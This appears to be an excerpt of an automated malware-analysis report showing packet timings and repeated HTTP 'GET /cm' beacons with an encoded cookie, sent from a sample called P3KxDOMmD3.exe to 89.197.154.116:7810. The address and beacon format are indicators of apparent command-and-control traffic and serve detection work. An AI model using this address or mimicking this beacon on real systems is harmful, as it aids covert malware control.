                                                                Oct 7, 2024 22:03:25.438770056 CEST78105011389.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:25.438851118 CEST501137810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:25.438967943 CEST501137810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:25.444557905 CEST78105011389.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:25.545672894 CEST501147810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:25.551268101 CEST78105011489.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:25.551373959 CEST501147810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:25.551630020 CEST501147810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:25.557008028 CEST78105011489.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:27.125340939 CEST78105011489.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:27.125402927 CEST501147810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:27.125454903 CEST501147810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:27.130590916 CEST78105011489.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:27.236203909 CEST501157810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:27.241509914 CEST78105011589.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:27.241589069 CEST501157810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:27.241765976 CEST501157810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:27.246597052 CEST78105011589.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:31.246893883 CEST501157810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:31.359719038 CEST501167810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:31.364828110 CEST78105011689.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:31.364897966 CEST501167810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:31.365053892 CEST501167810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:31.369899035 CEST78105011689.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:32.940270901 CEST78105011689.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:32.940346956 CEST501167810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:32.940416098 CEST501167810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:32.945436001 CEST78105011689.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:33.046451092 CEST501177810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:33.051609993 CEST78105011789.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:33.051675081 CEST501177810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:33.051806927 CEST501177810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:33.056655884 CEST78105011789.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:34.924628019 CEST78105011789.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:34.924691916 CEST501177810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:34.924787998 CEST501177810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:34.925229073 CEST78105011789.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:34.925268888 CEST501177810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:34.929707050 CEST78105011789.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:35.030698061 CEST501187810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:35.036053896 CEST78105011889.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:35.036113977 CEST501187810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:35.036241055 CEST501187810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:35.041461945 CEST78105011889.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:36.645173073 CEST78105011889.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:36.647798061 CEST501187810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:36.647990942 CEST501187810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:36.653239012 CEST78105011889.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:36.767709017 CEST501197810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:36.772954941 CEST78105011989.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:36.775821924 CEST501197810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:36.776012897 CEST501197810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:36.781240940 CEST78105011989.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:38.366823912 CEST78105011989.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:38.367772102 CEST501197810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:38.367903948 CEST501197810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:38.372755051 CEST78105011989.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:38.483432055 CEST501207810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:38.488564014 CEST78105012089.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:38.489633083 CEST501207810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:38.489892960 CEST501207810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:38.495486975 CEST78105012089.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:40.067204952 CEST78105012089.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:40.067333937 CEST501207810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:40.067442894 CEST501207810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:40.072472095 CEST78105012089.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:40.170636892 CEST501217810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:40.175831079 CEST78105012189.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:40.176038027 CEST501217810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:40.176038027 CEST501217810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:40.181782961 CEST78105012189.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:41.793143988 CEST78105012189.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:41.793350935 CEST501217810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:41.793350935 CEST501217810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:41.798387051 CEST78105012189.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:41.905137062 CEST501227810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:41.910243988 CEST78105012289.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:41.910474062 CEST501227810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:41.914148092 CEST501227810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:41.919074059 CEST78105012289.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:43.493761063 CEST78105012289.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:43.493833065 CEST501227810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:43.493891954 CEST501227810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:43.499005079 CEST78105012289.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:43.608752966 CEST501237810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:43.613935947 CEST78105012389.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:43.614029884 CEST501237810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:43.614250898 CEST501237810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:43.882054090 CEST78105012389.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:45.472049952 CEST78105012389.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:45.472141027 CEST501237810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:45.556164026 CEST501237810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:45.671101093 CEST501247810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:45.856220007 CEST501237810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:45.908447027 CEST78105012389.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:45.908466101 CEST78105012489.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:45.908474922 CEST78105012389.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:45.908550024 CEST501247810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:45.908581972 CEST501237810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:45.908759117 CEST501247810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:45.913804054 CEST78105012489.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:47.489037037 CEST78105012489.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:47.489094019 CEST501247810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:47.489178896 CEST501247810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:47.593121052 CEST501257810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:47.731630087 CEST78105012489.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:47.731683969 CEST501247810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:47.732803106 CEST78105012489.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:47.732839108 CEST78105012589.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:47.732929945 CEST501257810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:47.733508110 CEST501257810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:47.738317013 CEST78105012589.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:49.298619986 CEST78105012589.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:49.298703909 CEST501257810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:49.298804045 CEST501257810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:49.303956985 CEST78105012589.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:49.406322956 CEST501267810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:49.411509991 CEST78105012689.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:49.411587954 CEST501267810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:49.411884069 CEST501267810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:49.416786909 CEST78105012689.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:51.006023884 CEST78105012689.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:51.006115913 CEST501267810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:51.006259918 CEST501267810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:51.011276960 CEST78105012689.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:51.240916967 CEST501277810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:51.246026039 CEST78105012789.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:51.246093035 CEST501277810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:51.247157097 CEST501277810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:51.252183914 CEST78105012789.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:52.813980103 CEST78105012789.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:52.816639900 CEST501277810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:52.816732883 CEST501277810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:52.821682930 CEST78105012789.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:52.923728943 CEST501287810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:52.929172039 CEST78105012889.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:52.929367065 CEST501287810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:52.929528952 CEST501287810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:52.935049057 CEST78105012889.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:54.502327919 CEST78105012889.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:54.507410049 CEST501287810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:54.507441044 CEST501287810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:54.512794971 CEST78105012889.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:54.610426903 CEST501297810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:54.615592957 CEST78105012989.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:54.615715981 CEST501297810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:54.615895987 CEST501297810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:54.620887995 CEST78105012989.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:56.419128895 CEST78105012989.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:56.419857979 CEST501297810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:56.419857979 CEST501297810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:56.424715042 CEST78105012989.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:56.531433105 CEST501307810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:56.536395073 CEST78105013089.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:56.536534071 CEST501307810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:56.536883116 CEST501307810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:56.541651964 CEST78105013089.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:58.131736040 CEST78105013089.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:58.135993004 CEST501307810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:58.135993004 CEST501307810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:58.140861988 CEST78105013089.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:58.249382973 CEST501317810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:58.254472017 CEST78105013189.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:58.254662991 CEST501317810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:58.254662991 CEST501317810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:58.259569883 CEST78105013189.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:59.879194021 CEST78105013189.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:03:59.879302025 CEST501317810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:59.881572962 CEST501317810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:03:59.886670113 CEST78105013189.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:04:00.025152922 CEST501327810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:04:00.030544996 CEST78105013289.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:04:00.034363031 CEST501327810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:04:00.034507990 CEST501327810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:04:00.039597034 CEST78105013289.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:04:01.843373060 CEST78105013289.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:04:01.843456984 CEST501327810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:04:01.843554020 CEST501327810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:04:01.843628883 CEST78105013289.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:04:01.843672037 CEST501327810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:04:01.848541021 CEST78105013289.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:04:01.967870951 CEST501337810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:04:01.973436117 CEST78105013389.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:04:01.973540068 CEST501337810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:04:01.973644018 CEST501337810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:04:01.978549957 CEST78105013389.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:04:03.584256887 CEST78105013389.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:04:03.584335089 CEST501337810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:04:03.584419966 CEST501337810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:04:03.590887070 CEST78105013389.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:04:03.702655077 CEST501347810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:04:03.707755089 CEST78105013489.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:04:03.707967043 CEST501347810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:04:03.708085060 CEST501347810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:04:03.713037014 CEST78105013489.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:04:07.715970039 CEST501347810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:04:07.827104092 CEST501357810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:04:07.832660913 CEST78105013589.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:04:07.832803011 CEST501357810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:04:07.832915068 CEST501357810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:04:07.838213921 CEST78105013589.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:04:10.473695993 CEST78105013589.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:04:10.473795891 CEST501357810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:04:10.473881006 CEST501357810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:04:10.474369049 CEST78105013589.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:04:10.474430084 CEST501357810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:04:10.475099087 CEST78105013589.197.154.116192.168.2.4
                                                                Oct 7, 2024 22:04:10.475153923 CEST501357810192.168.2.489.197.154.116
                                                                Oct 7, 2024 22:04:10.479134083 CEST78105013589.197.154.116192.168.2.4
                                                                • 89.197.154.116:7810
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.44973089.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:00:03.306828022 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.44973189.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:00:05.236342907 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.44973289.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:00:06.940051079 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.44973389.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:00:08.646265030 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.44973489.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:00:10.452492952 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.44973589.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:00:12.143825054 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.44973689.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:00:13.972333908 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.44973789.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:00:15.702023983 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.44973889.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:00:17.426239967 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.44974189.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:00:19.145735979 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                10192.168.2.44974589.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:00:20.849200010 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                11192.168.2.44974789.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:00:22.724162102 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                12192.168.2.44974889.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:00:24.410253048 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
